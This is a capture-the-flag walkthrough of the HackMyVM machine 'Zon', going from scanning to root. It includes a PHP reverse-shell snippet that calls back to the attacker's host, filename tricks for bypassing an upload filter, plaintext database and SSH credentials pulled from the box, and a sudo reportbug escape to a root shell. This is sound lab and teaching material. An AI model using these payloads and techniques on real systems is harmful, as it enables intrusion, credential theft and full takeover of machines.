<h1>Zon</h1>
<p>hmv[-_-]Zon, posted 2024-04-01</p>
<blockquote>
<p>This box is best done with a bridged adapter; on a campus network, bridge through a phone hotspot.</p>
</blockquote>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445097.png" alt="image-20240401133315374" /><br />
<img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445099.png" alt="image-20240401133419388" /></p>
<p>One look at the scan and it was clearly wrong. I tried switching to a NAT adapter and rescanning; you could also switch hotspots and keep scanning in bridged mode, but I'm lazy.</p>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445100.png" alt="image-20240401133628658" /></p>
<p>That's more like it!</p>
<h2>Information Gathering</h2>
<h3>Port Scanning</h3>
<pre><code class="language-bash">rustscan -a 10.0.2.16 -- -A</code></pre>
<blockquote>
<p>I had been writing this wrong before, putting more arguments after <code>-A</code>. The <code>-A</code> here is actually <code>nmap</code>'s <code>-A</code>; I had always thought it was the <code>rustscan</code> option that hands control over to nmap.</p>
</blockquote>
<pre><code class="language-css">Open 10.0.2.16:22
Open 10.0.2.16:80</code></pre>
<pre><code class="language-css">PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 9.2p1 Debian 2+deb12u1 (protocol 2.0)
| ssh-hostkey: 
|   256 dd:83:da:cb:45:d3:a8:ea:c6:be:19:03:45:76:43:8c (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOHL4gbzUOgWlMW/HgWpBe3FlvvdyW1IsS+o1NK/YbUOoM3iokvdbkFxXdYjyvzkNpvpCXfldEQwS+BIfEmdtwU=
|   256 e5:5f:7f:25:aa:c0:18:04:c4:46:98:b3:5d:a5:2b:48 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC0o8/EYPi0jQMqY1zqXqlKfugpCtjg0i5m3bzbyfqxt
80/tcp open  http    syn-ack Apache httpd 2.4.57 ((Debian))
|_http-server-header: Apache/2.4.57 (Debian)
|_http-title: zon
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel</code></pre>
<h3>Directory Scanning</h3>
<pre><code class="language-bash">feroxbuster -u http://10.0.2.16</code></pre>
<pre><code class="language-css">301      GET        9l       28w      307c http://10.0.2.16/images =&gt; http://10.0.2.16/images/
301      GET        9l       28w      304c http://10.0.2.16/css =&gt; http://10.0.2.16/css/
301      GET        9l       28w      308c http://10.0.2.16/uploads =&gt; http://10.0.2.16/uploads/
301      GET        9l       28w      306c http://10.0.2.16/fonts =&gt; http://10.0.2.16/fonts/
200      GET      405l     2619w   206407c http://10.0.2.16/images/ser_img3.png
200      GET     1452l     5977w   212322c http://10.0.2.16/fonts/fontawesome-webfont.ttf
200      GET      823l     4393w   196808c http://10.0.2.16/fonts/Poppins-BoldItalic.ttf
301      GET        9l       28w      305c http://10.0.2.16/icon =&gt; http://10.0.2.16/icon/
301      GET        9l       28w      303c http://10.0.2.16/js =&gt; http://10.0.2.16/js/
200      GET      153l      449w     4306c http://10.0.2.16/js/custom.js
200      GET        7l      896w    70808c http://10.0.2.16/js/bootstrap.bundle.min.js
200      GET     2492l    14276w  1161727c http://10.0.2.16/images/coff_img.png
200      GET     6433l    20653w   210612c http://10.0.2.16/js/bootstrap.bundle.js
200      GET      936l     5441w   417516c http://10.0.2.16/images/blog1.jpg
200      GET      846l     5909w   499091c http://10.0.2.16/images/blog2.jpg
200      GET        3l       44w     1167c http://10.0.2.16/images/menu_icon.png
200      GET      158l      967w    79372c http://10.0.2.16/images/footer_af.png
200      GET      342l     1878w   139839c http://10.0.2.16/images/footer_be.png
200      GET     1197l     2079w    21393c http://10.0.2.16/css/style.css
200      GET      269l     1633w   128756c http://10.0.2.16/images/ser_img2.png
200      GET      614l     1238w    11416c http://10.0.2.16/css/default-skin.css
200      GET      443l     2610w   197291c http://10.0.2.16/images/ser_img1.png
200      GET      242l     1313w    65160c http://10.0.2.16/images/loading.gif
200      GET       62l      404w    31130c http://10.0.2.16/images/test_pro.jpg
200      GET     3615l    22189w  1818685c http://10.0.2.16/images/about.png
200      GET      294l     1613w   122935c http://10.0.2.16/images/coff.png
200      GET        5l     1287w    87088c http://10.0.2.16/js/jquery.min.js
200      GET        5l      478w    45479c http://10.0.2.16/js/jquery.mCustomScrollbar.concat.min.js
200      GET      304l      604w     6678c http://10.0.2.16/css/responsive.css
200      GET        7l      277w    44342c http://10.0.2.16/js/owl.carousel.min.js
200      GET        6l       77w     3351c http://10.0.2.16/css/owl.carousel.min.css
200      GET        7l     1604w   140421c http://10.0.2.16/css/bootstrap.min.css
200      GET      213l     1380w    11324c http://10.0.2.16/js/jquery-3.0.0.min.js
200      GET        1l      870w    42839c http://10.0.2.16/css/jquery.mCustomScrollbar.min.css
200      GET      373l     1987w   186433c http://10.0.2.16/fonts/Poppins-Thin.ttf
200      GET      259l     1703w   182124c http://10.0.2.16/fonts/Poppins-Regular.ttf
200      GET      392l     2209w   177523c http://10.0.2.16/fonts/fontawesome-webfont.woff
200      GET      288l     1759w   139600c http://10.0.2.16/fonts/fontawesome-webfont.woff2
200      GET      620l     5062w   200792c http://10.0.2.16/fonts/Poppins-Italic.ttf
200      GET      260l     1915w   178138c http://10.0.2.16/fonts/Poppins-SemiBold.ttf
200      GET      511l     1445w    29170c http://10.0.2.16/
200      GET      623l     4094w   197884c http://10.0.2.16/fonts/Poppins-MediumItalic.ttf
200      GET      667l     4170w   204813c http://10.0.2.16/fonts/Poppins-ExtraLightItalic.ttf
200      GET      353l     2394w   176854c http://10.0.2.16/fonts/Poppins-Black.ttf
200      GET      845l     4921w   158169c http://10.0.2.16/fonts/IcoMoon-Free.ttf
200      GET     1452l     5979w   212524c http://10.0.2.16/fonts/fontawesome-webfont.eot
200      GET      257l     2142w   178822c http://10.0.2.16/fonts/Poppins-ExtraBold.ttf
200      GET        7l      570w    50676c http://10.0.2.16/js/bootstrap.min.js
200      GET      105l      230w     2716c http://10.0.2.16/js/slider-setting.js
200      GET      723l     4178w   206437c http://10.0.2.16/fonts/Poppins-ThinItalic.ttf
200      GET        6l      352w    19190c http://10.0.2.16/js/popper.min.js
200      GET       30l      170w     3969c http://10.0.2.16/js/revolution/assets/loader.gif
200      GET        3l       40w      957c http://10.0.2.16/js/revolution/assets/gridtile_white.png
200      GET        3l       38w      966c http://10.0.2.16/js/revolution/assets/gridtile_3x3_white.png
200      GET        3l       39w      963c http://10.0.2.16/js/revolution/assets/gridtile.png
200      GET        3l       37w      976c http://10.0.2.16/js/revolution/assets/gridtile_3x3.png
200      GET      773l     4356w   195244c http://10.0.2.16/fonts/Poppins-ExtraBoldItalic.ttf
200      GET        8l      608w    62649c http://10.0.2.16/js/revolution/js/jquery.themepunch.revolution.min.js
200      GET      136l     1626w   107075c http://10.0.2.16/js/revolution/js/jquery.themepunch.tools.min.js
200      GET     1151l     5151w   202793c http://10.0.2.16/fonts/Poppins-LightItalic.ttf
200      GET      281l     1994w   180221c http://10.0.2.16/fonts/Poppins-Bold.ttf
200      GET      307l     1670w   178862c http://10.0.2.16/fonts/Poppins-Medium.ttf
200      GET      563l     4120w   191994c http://10.0.2.16/fonts/Poppins-BlackItalic.ttf
200      GET      177l      358w     3653c http://10.0.2.16/css/nice-select.css
200      GET      358l     1712w   185187c http://10.0.2.16/fonts/Poppins-ExtraLight.ttf
200      GET      108l      179w     1884c http://10.0.2.16/css/slick.css
200      GET        1l      158w    14143c http://10.0.2.16/css/jquery.fancybox.min.css
200      GET        2l      433w    53678c http://10.0.2.16/css/animate.min.css
200      GET     2671l    62869w   444379c http://10.0.2.16/fonts/fontawesome-webfont.svg
200      GET     8950l    17395w   172839c http://10.0.2.16/css/bootstrap.css
200      GET        4l       66w    31000c http://10.0.2.16/css/font-awesome.min.css
200      GET     2574l     4782w   258854c http://10.0.2.16/fonts/FontAwesome.otf
200      GET      806l     4004w   195419c http://10.0.2.16/fonts/Poppins-SemiBoldItalic.ttf
200      GET      262l     1711w   183624c http://10.0.2.16/fonts/Poppins-Light.ttf
200      GET        3l        9w      224c http://10.0.2.16/js/revolution/assets/coloredbg.png
200      GET        1l        4w      586c http://10.0.2.16/js/revolution/css/closedhand.html
200      GET     5798l    11097w   140645c http://10.0.2.16/js/revolution/css/layers.css
200      GET     2637l     4520w    59474c http://10.0.2.16/js/revolution/css/navigation.css
200      GET        1l        5w      582c http://10.0.2.16/js/revolution/css/openhand.html
200      GET        7l      443w    29490c http://10.0.2.16/js/revolution/css/settings.css</code></pre>
<h2>Vulnerability Discovery</h2>
<h3>Visiting Sensitive Directories</h3>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445101.png" alt="image-20240401134414023" /></p>
<p>Loading resources was ridiculously slow; the page probably needs to fetch resources from other sites. Switched to a hotspot and bridged...</p>
<pre><code class="language-bash"># kali
172.20.10.8
# Zon
172.20.10.12</code></pre>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445102.png" alt="image-20240401135135873" /></p>
<p>Visit it:</p>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445103.png" alt="image-20240401135224091" /></p>
<p>Checked the sensitive directories, but found nothing.</p>
<h3>Second Round of Information Gathering</h3>
<pre><code class="language-bash">gobuster dir -u http://172.20.10.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html.png,jpg,zip</code></pre>
<pre><code class="language-text">/.html.png            (Status: 403) [Size: 277]
/index.php            (Status: 200) [Size: 29170]
/images               (Status: 301) [Size: 313] [--&gt; http://172.20.10.12/images/]
/.php                 (Status: 403) [Size: 277]
/about.php            (Status: 200) [Size: 10538]
/contact.php          (Status: 200) [Size: 11753]
/blog.php             (Status: 200) [Size: 12490]
/uploads              (Status: 301) [Size: 314] [--&gt; http://172.20.10.12/uploads/]
/upload.php           (Status: 500) [Size: 0]
/service.php          (Status: 200) [Size: 12239]
/report.php           (Status: 200) [Size: 13]
/icon                 (Status: 301) [Size: 311] [--&gt; http://172.20.10.12/icon/]
/css                  (Status: 301) [Size: 310] [--&gt; http://172.20.10.12/css/]
/js                   (Status: 301) [Size: 309] [--&gt; http://172.20.10.12/js/]
/fonts                (Status: 301) [Size: 312] [--&gt; http://172.20.10.12/fonts/]
/choose.php           (Status: 200) [Size: 1908]
/testimonial.php      (Status: 200) [Size: 17014]
/.php                 (Status: 403) [Size: 277]
/.html.png            (Status: 403) [Size: 277]
/server-status        (Status: 403) [Size: 277]</code></pre>
<p>Keep checking the sensitive directories:</p>
<pre><code class="language-apl">/choose.php</code></pre>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445104.png" alt="image-20240401140127627" /></p>
<h3>File Upload</h3>
<p>There is a place to upload a <code>zip containing a jpeg</code>; let's craft one:</p>
<pre><code class="language-bash">head revershell.php  

  &lt;?php
  // php-reverse-shell - A Reverse Shell implementation in PHP
  // Copyright (C) 2007 pentestmonkey@pentestmonkey.net
  set_time_limit (0);
  $VERSION = "1.0";
  $ip = '172.20.10.8';  // You have changed this
  $port = 1234;  // And this
  $chunk_size = 1400;</code></pre>
<p>Rename it, zip it, and submit:</p>
<pre><code class="language-bash">revershell.jpeg.php
revershell.php%00.jpeg
revershell.jpeg .php</code></pre>
<p>The last one worked:</p>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445105.png" alt="image-20240401142516477" /></p>
<h2>Privilege Escalation</h2>
<h3>Information Gathering</h3>
<pre><code class="language-css">(remote) www-data@zon:/$ whoami;id
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
(remote) www-data@zon:/$ pwd
/
(remote) www-data@zon:/$ ls
bin   dev  home        initrd.img.old  lib32  libx32      media  opt   root  sbin  sys  usr  vmlinuz
boot  etc  initrd.img  lib             lib64  lost+found  mnt    proc  run   srv   tmp  var  vmlinuz.old
(remote) www-data@zon:/$ find / -perm -u=s -type f 2&gt;/dev/null
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/su
/usr/bin/mount
/usr/bin/chfn
/usr/bin/umount
/usr/sbin/pppd
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/polkit-1/polkit-agent-helper-1
(remote) www-data@zon:/$ cd /var/www/html
(remote) www-data@zon:/var/www/html$ ls
about.php  choose.php   css    hashDB.sh  images     js          service.php      upload.php
blog.php   contact.php  fonts  icon       index.php  report.php  testimonial.php  uploads
(remote) www-data@zon:/var/www/html$ cat hashDB.sh 
#!/bin/bash

# script that checks the database's integrity every minute

dump=/dev/shm/dump.sql
log=/var/log/db_integrity_check.log
true &gt; "${log}"

/usr/bin/mysqldump -u admin -pudgrJbFc6Av#U3 admin credentials &gt; "${dump}"
/usr/bin/sed -i '$d' "${dump}"

hash="29d8e6b76aab0254f7fe439a6a5d2fba64270dde087e6dfab57fa57f6749858a"
check_hash=$(sha256sum "${dump}" | awk '{print $1}')

if [[ "${hash}" != "${check_hash}" ]] ; then
  /usr/bin/wall "Alert ! Database hacked !"
  /usr/bin/du -sh /var/lib/mysql &gt;&gt; "${log}"
  /usr/bin/vmstat 1 3 &gt;&gt; "${log}"
else
  /usr/bin/sync &amp;&amp; /usr/bin/echo 3 &gt; /proc/sys/vm/drop_caches
  /usr/bin/echo "$(date) : Integrity check completed for ${dump}" &gt;&gt; "${log}"
fi</code></pre>
<p>This gives us the database username and password:</p>
<pre><code class="language-apl">admin
udgrJbFc6Av#U3</code></pre>
<h3>Connecting to the Database</h3>
<pre><code class="language-bash">mysql -u admin -p</code></pre>
<pre><code class="language-css">MariaDB [(none)]&gt; show databases;
+--------------------+
| Database           |
+--------------------+
| admin              |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.041 sec)

MariaDB [(none)]&gt; use admin;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
MariaDB [admin]&gt; show tables;
+-----------------+
| Tables_in_admin |
+-----------------+
| credentials     |
+-----------------+
1 row in set (0.000 sec)

MariaDB [admin]&gt; select * from credentials;
+----------+-------------------------+
| username | password                |
+----------+-------------------------+
| Freddie  | LDVK@dYiEa2I1lnjrEeoMif |
+----------+-------------------------+
1 row in set (0.000 sec)</code></pre>
<h3>SSH Login as Freddie</h3>
<p>This looks like a user account; check whether that user actually exists on the box:</p>
<pre><code class="language-css">cat /etc/passwd
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
messagebus:x:100:107::/nonexistent:/usr/sbin/nologin
avahi-autoipd:x:101:109:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
sshd:x:102:65534::/run/sshd:/usr/sbin/nologin
dnsmasq:x:103:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
polkitd:x:996:996:polkit:/nonexistent:/usr/sbin/nologin
mysql:x:104:112:MySQL Server,,,:/nonexistent:/bin/false
Debian-snmp:x:105:113::/var/lib/snmp:/bin/false
freddie:x:1000:1000:,,,:/home/freddie:/bin/zsh</code></pre>
<p>It does. Try connecting over SSH:</p>
<pre><code class="language-apl">Freddie
LDVK@dYiEa2I1lnjrEeoMif</code></pre>
<pre><code class="language-bash">ssh freddie@172.20.10.12</code></pre>
<h3>Information Gathering</h3>
<pre><code class="language-bash">╭─freddie@zon ~ 
╰─$ whoami;id
freddie
uid=1000(freddie) gid=1000(freddie) groups=1000(freddie),100(users)
╭─freddie@zon ~ 
╰─$ ls -la
total 44
drwx------  4 freddie freddie 4096 Apr  1 08:35 .
drwxr-xr-x  3 root    root    4096 Nov 27 20:22 ..
lrwxrwxrwx  1 root    root       9 Dec  3 10:46 .bash_history -&gt; /dev/null
-rw-r--r--  1 freddie freddie  220 Nov 27 20:22 .bash_logout
-rw-r--r--  1 freddie freddie 3526 Nov 27 20:22 .bashrc
drwxr-xr-x  3 freddie freddie 4096 Dec  1 21:06 .local
drwxr-xr-x 12 freddie freddie 4096 Apr  1 08:34 .oh-my-zsh
-rw-r--r--  1 freddie freddie  807 Nov 27 20:22 .profile
-rwx------  1 freddie freddie   33 Nov 30 07:21 user.txt
-rw-r--r--  1 freddie freddie  169 Apr  1 08:34 .wget-hsts
-rw-------  1 freddie freddie   22 Apr  1 08:35 .zsh_history
-rw-r--r--  1 freddie freddie 3890 Nov 27 20:22 .zshrc
╭─freddie@zon ~ 
╰─$ cat user.txt
a0b4603c7fde7e4113d2ee5fbee5a038
╭─freddie@zon ~ 
╰─$ sudo -l
sudo: unable to resolve host zon: Name or service not known
Matching Defaults entries for freddie on zon:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin, use_pty

User freddie may run the following commands on zon:
    (ALL : ALL) NOPASSWD: /usr/bin/reportbug</code></pre>
<p>Opening it shows a very, very long Python script; just try running it directly:</p>
<pre><code class="language-bash">sudo /usr/bin/reportbug</code></pre>
<p>After a few random selections you end up here:</p>
<p><img src="https://pic-for-be.oss-cn-hangzhou.aliyuncs.com/img/202404011445106.png" alt="image-20240401144409120" /></p>
<p>Typing <code>!/bin/bash</code> in vim completes the privilege escalation.</p>
<pre><code class="language-css">Select an editor.  To change later, run 'select-editor'.
  1. /bin/nano        &lt;---- easiest
  2. /usr/bin/vim.tiny

Choose 1-2 [1]: 2

root@zon:/tmp# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)
root@zon:/tmp# cd /root
root@zon:~# ls
root.txt
root@zon:~# cat root.txt
18a72aa09ce61fb487fd6745c8eba769</code></pre>